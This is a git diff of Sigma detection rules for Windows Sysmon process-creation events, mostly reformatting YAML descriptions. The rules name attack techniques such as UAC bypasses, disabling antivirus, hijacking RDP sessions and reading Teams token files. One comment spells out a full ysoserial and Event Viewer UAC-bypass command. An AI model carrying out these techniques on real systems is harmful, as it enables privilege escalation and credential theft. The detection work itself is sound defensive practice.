@@ -20,12 +18,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_pe:
- - Image|endswith:
- - \Sysmon64.exe
- - \Sysmon.exe
- - Description: System activity monitor
+ - Image|endswith:
+ - \Sysmon64.exe
+ - \Sysmon.exe
+ - Description: System activity monitor
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - -c
 - /c
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml
index 09b817916..76e43213d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml
@@ -1,8 +1,7 @@
 title: Uninstall Sysinternals Sysmon
 id: 6a5f68d1-c4b5-46b9-94ee-5324892ea939
 status: test
-description: Detects the removal of Sysmon, which could be a potential attempt at
- defense evasion
+description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon
 author: frack113
@@ -20,17 +19,16 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_pe:
- - Image|endswith:
- - \Sysmon64.exe
- - \Sysmon.exe
- - Description: System activity monitor
+ - Image|endswith:
+ - \Sysmon64.exe
+ - \Sysmon.exe
+ - Description: System activity monitor
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - -u
 - /u
 condition: process_creation and (all of selection_*)
 falsepositives:
- - Legitimate administrators might use this command to remove Sysmon for debugging
- purposes
+ - Legitimate administrators might use this command to remove Sysmon for debugging purposes
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml
index e9330e144..626b31252 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml
@@ -1,8 +1,7 @@
 title: Potential Binary Impersonating Sysinternals Tools
 id: 7cce6fc8-a07f-4d84-a53e-96e1879843c9
 status: test
-description: Detects binaries that use the same name as legitimate sysinternals tools
- to evade detection
+description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
 references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
 author: frack113
@@ -173,7 +172,7 @@ detection:
 - Sysinternals - www.sysinternals.com
 - Sysinternals
 filter_empty:
- Company: null
+ Company:
 condition: process_creation and (selection_exe and not 1 of filter*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml b/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml
index e9661fd34..e7d0e0fe2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml
@@ -1,8 +1,7 @@
 title: Sysprep on AppData Folder
 id: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e
 status: test
-description: Detects suspicious sysprep process start with AppData folder as target
- (as used by Trojan Syndicasec in Thrip report by Symantec)
+description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
 references:
 - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets
 - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b
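Review bot: In the second hunk of the tools_masquerading file, `Company: null` becomes a bare `Company:`, which a YAML parser resolves to the same null value but which reads like an entry whose value was accidentally left out. Since filter_empty exists specifically to express "the Company field is absent", the explicit form documents that intent, so I would keep `Company: null` (or add `# field absent` after the bare key if the converter cannot emit the literal). This is a readability point only; the condition on the following line is unaffected either way.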
@@ -22,10 +21,9 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \sysprep.exe
- CommandLine|contains: \AppData\
+ CommandLine|contains: \AppData\
 condition: process_creation and selection
 falsepositives:
- - False positives depend on scripts and administrative tools used in the monitored
- environment
+ - False positives depend on scripts and administrative tools used in the monitored environment
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml
index 134e4734f..509797fdc 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml
@@ -20,8 +20,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - Image|endswith: \systeminfo.exe
- - OriginalFileName: sysinfo.exe
+ - Image|endswith: \systeminfo.exe
+ - OriginalFileName: sysinfo.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml b/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
index 4e032a4ae..218ba0f72 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
@@ -1,11 +1,10 @@
 title: Potential Signing Bypass Via Windows Developer Features
 id: a383dec4-deec-4e6e-913b-ed9249670848
 related:
- - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1
- type: similar
+ - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1
+ type: similar
 status: test
-description: Detects when a user enable developer features such as "Developer Mode"
- or "Application Sideloading". Which allows the user to install untrusted packages.
+description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
 references:
 - Internal Research
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
@@ -22,12 +21,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \SystemSettingsAdminFlows.exe
- - OriginalFileName: SystemSettingsAdminFlows.EXE
+ - Image|endswith: \SystemSettingsAdminFlows.exe
+ - OriginalFileName: SystemSettingsAdminFlows.EXE
 selection_flag:
- CommandLine|contains: TurnOnDeveloperFeatures
+ CommandLine|contains: TurnOnDeveloperFeatures
 selection_options:
- CommandLine|contains:
+ CommandLine|contains:
 - DeveloperUnlock
 - EnableSideloading
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml b/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml
index c1f96c63c..af70d4cc1 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml
@@ -1,8 +1,7 @@
 title: Suspicious Recursive Takeown
 id: 554601fb-9b71-4bcc-abf4-21a611be4fde
 status: test
-description: Adversaries can interact with the DACLs using built-in Windows commands
- takeown which can grant adversaries higher permissions on specific files and folders
+description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility
@@ -22,7 +21,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \takeown.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - '/f '
 - /r
 condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml
index 89cf836be..c1524b45f 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml
@@ -1,8 +1,7 @@
 title: Tap Installer Execution
 id: 99793437-3e16-439b-be0f-078782cf953d
 status: test
-description: Well-known TAP software installation. Possible preparation for data exfiltration
- using tunneling techniques
+description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
 author: Daniil Yugoslavskiy, Ian Davis, oscd.community
 date: 2019/10/24
 modified: 2023/12/11
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml
index 374e86663..02ce3fbaf 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml
@@ -1,11 +1,9 @@
 title: Compressed File Creation Via Tar.EXE
 id: 418a3163-3247-4b7b-9933-dcfcb7c52ea9
 status: experimental
-description: 'Detects execution of "tar.exe" in order to create a compressed file.
-
+description: |
+ Detects execution of "tar.exe" in order to create a compressed file.
 Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-
- '
 references:
 - https://unit42.paloaltonetworks.com/chromeloader-malware/
 - https://lolbas-project.github.io/lolbas/Binaries/Tar/
@@ -26,10 +24,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \tar.exe
- - OriginalFileName: bsdtar
+ - Image|endswith: \tar.exe
+ - OriginalFileName: bsdtar
 selection_create:
- CommandLine|contains:
+ CommandLine|contains:
 - -c
 - -r
 - -u
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml b/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml
index 66defc65e..ff52aa94c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml
@@ -1,11 +1,9 @@
 title: Compressed File Extraction Via Tar.EXE
 id: bf361876-6620-407a-812f-bfe11e51e924
 status: experimental
-description: 'Detects execution of "tar.exe" in order to extract compressed file.
-
+description: |
+ Detects execution of "tar.exe" in order to extract compressed file.
 Adversaries may abuse various utilities in order to decompress data to avoid detection.
-
- '
 references:
 - https://unit42.paloaltonetworks.com/chromeloader-malware/
 - https://lolbas-project.github.io/lolbas/Binaries/Tar/
@@ -26,10 +24,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \tar.exe
- - OriginalFileName: bsdtar
+ - Image|endswith: \tar.exe
+ - OriginalFileName: bsdtar
 selection_extract:
- CommandLine|contains: -x
+ CommandLine|contains: -x
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Likely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml b/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml
index abd5bba73..665a02354 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml
@@ -1,17 +1,10 @@
 title: Taskkill Symantec Endpoint Protection
 id: 4a6713f6-3331-11ed-a261-0242ac120002
 status: test
-description: 'Detects one of the possible scenarios for disabling Symantec Endpoint
- Protection.
-
- Symantec Endpoint Protection antivirus software services incorrectly implement
- the protected service mechanism.
-
- As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command
- several times ccSvcHst.exe /f, thereby killing the process belonging to the service,
- and thus shutting down the service.
-
- '
+description: |
+ Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
+ Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
+ As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
 references:
 - https://www.exploit-db.com/exploits/37525
 - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection
@@ -30,7 +23,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - taskkill
 - ' /F '
 - ' /IM '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml
index 37d4fa2cc..b4910dca0 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml
@@ -1,9 +1,7 @@
 title: Suspicious Tasklist Discovery Command
 id: 63332011-f057-496c-ad8d-d2b6afb27f96
 status: test
-description: Adversaries may attempt to get information about running processes on
- a system. Information obtained could be used to gain an understanding of common
- software/applications running on systems within the network
+description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist
 author: frack113
@@ -21,9 +19,9 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - CommandLine|contains: tasklist
- - Image|endswith: \tasklist.exe
- - OriginalFileName: tasklist.exe
+ - CommandLine|contains: tasklist
+ - Image|endswith: \tasklist.exe
+ - OriginalFileName: tasklist.exe
 condition: process_creation and selection
 falsepositives:
 - Administrator, hotline ask to user
diff --git a/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml b/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml
index b84a51e9a..c15b2d337 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml
@@ -17,7 +17,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- User|contains:
+ User|contains: # covers many language settings
 - AUTHORI
 - AUTORI
 Image|endswith: \taskmgr.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
index 2310c8462..9f01dc21d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
@@ -1,13 +1,9 @@
 title: Potentially Suspicious Command Targeting Teams Sensitive Files
 id: d2eb17db-1d39-41dc-b57f-301f6512fa75
 status: experimental
-description: 'Detects a commandline containing references to the Microsoft Teams database
- or cookies files from a process other than Teams.
-
- The database might contain authentication tokens and other sensitive information
- about the logged in accounts.
-
- '
+description: |
+ Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
+ The database might contain authentication tokens and other sensitive information about the logged in accounts.
 references:
 - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
 - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
@@ -26,7 +22,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - \Microsoft\Teams\Cookies
 - \Microsoft\Teams\Local Storage\leveldb
 filter_main_legit_locations:
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml b/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml
index 7fd0d016b..7cd7278e7 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml
@@ -20,7 +20,7 @@ detection:
 Image|endswith: \tpmvscmgr.exe
 OriginalFileName: TpmVscMgr.exe
 selection_cli:
- CommandLine|contains: create
+ CommandLine|contains: create
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Legitimate usage by an administrator
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml b/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml
index 357568f06..ec18c8bff 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml
@@ -21,7 +21,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- User|contains:
+ User|contains: # covers many language settings
 - AUTHORI
 - AUTORI
 Image|endswith: \tscon.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml
index d77baee97..bf120e040 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml
@@ -23,7 +23,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains: ' /dest:rdp-tcp#'
+ CommandLine|contains: ' /dest:rdp-tcp#'
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml
index da180a230..8dea0edd2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml
@@ -17,8 +17,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \tscon.exe
- - OriginalFileName: tscon.exe
+ - Image|endswith: \tscon.exe
+ - OriginalFileName: tscon.exe
 selection_integrity:
 IntegrityLevel: SYSTEM
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml
index 08a9ab71f..8053b703a 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Using Disk Cleanup
 id: b697e69c-746f-4a86-9f59-7bfff8eab881
 status: test
-description: Detects the pattern of UAC Bypass using scheduled tasks and variable
- expansion of cleanmgr.exe (UACMe 34)
+description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
@@ -21,7 +20,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:'
+ CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:'
 ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
 IntegrityLevel:
 - High
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml
index b61630525..8504faeea 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml
@@ -1,8 +1,7 @@
 title: Bypass UAC via CMSTP
 id: e66779cc-383e-4224-a3a4-267eeb585c40
 status: test
-description: Detect commandline usage of Microsoft Connection Manager Profile Installer
- (cmstp.exe) to install specially formatted local .INF files
+description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
 references:
 - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md
@@ -24,10 +23,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \cmstp.exe
- - OriginalFileName: CMSTP.EXE
+ - Image|endswith: \cmstp.exe
+ - OriginalFileName: CMSTP.EXE
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - /s
 - -s
 - /au
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml
index 6b5f4a2b1..b0cacc30c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml
@@ -1,8 +1,7 @@
 title: CMSTP UAC Bypass via COM Object Access
 id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253
 status: stable
-description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile
- Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
+description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
 references:
 - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
 - https://twitter.com/hFireF0X/status/897640081053364225
@@ -30,11 +29,11 @@ detection:
 selection:
 ParentImage|endswith: \DllHost.exe
 ParentCommandLine|contains:
- - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
- - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}'
- - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}'
- - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'
- - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}'
+ - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll
+ - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL
+ - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll
+ - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll
+ - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl
 IntegrityLevel:
 - High
 - System
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml
index d871ab949..18a8fc902 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Tools Using ComputerDefaults
 id: 3c05e90d-7eba-4324-9972-5d7f711a60a8
 status: test
-description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe
- (UACMe 59)
+description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml
index 06d38d211..49caac2cc 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Using Consent and Comctl32 - Process
 id: 1ca6bd18-0ba0-44ca-851c-92ed89a61085
 status: test
-description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll
- (UACMe 22)
+description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml
index 595822a9f..62f5eb1df 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Using DismHost
 id: 853e74f9-9392-4935-ad3b-2e8c040dae86
 status: test
-description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe
- 63)
+description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml
index 97c36a887..a2f96e717 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml
@@ -1,8 +1,8 @@
 title: UAC Bypass Using Event Viewer RecentViews
 id: 30fc8de7-d833-40c4-96b6-28319fbc4f6c
 related:
- - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43
- type: similar
+ - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43
+ type: similar
 status: test
 description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
 references:
@@ -22,11 +22,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_path:
- CommandLine|contains:
+ # Example: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
+ CommandLine|contains:
 - \Event Viewer\RecentViews
 - \EventV~1\RecentViews
 selection_redirect:
- CommandLine|contains: '>'
+ CommandLine|contains: '>'
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml
index 300fe3e08..13f71f514 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml
@@ -1,8 +1,7 @@
 title: Bypass UAC via Fodhelper.exe
 id: 7f741dcf-fc22-4759-87b4-9ae8376676a2
 status: test
-description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries
- use this technique to execute privileged processes.
+description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
 references:
 - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
index 1319f89d3..56650d0eb 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass via Windows Firewall Snap-In Hijack
 id: e52cb31c-10ed-4aea-bcb7-593c9f4a315b
 status: test
-description: Detects attempts to bypass User Account Control (UAC) by hijacking the
- Microsoft Management Console (MMC) Windows Firewall snap-in
+description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
 references:
 - https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack
 author: Tim Rauch
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
index e9acee70e..863cb1721 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
@@ -25,8 +25,8 @@ detection:
 - /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
 - /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}
 filter:
- - Image|endswith: \WerFault.exe
- - OriginalFileName: WerFault.exe
+ - Image|endswith: \WerFault.exe
+ - OriginalFileName: WerFault.exe
 condition: process_creation and (selection and not filter)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml
index 2a2f2bd26..00ef5c5f5 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml
@@ -24,7 +24,7 @@ detection:
 - High
 - System
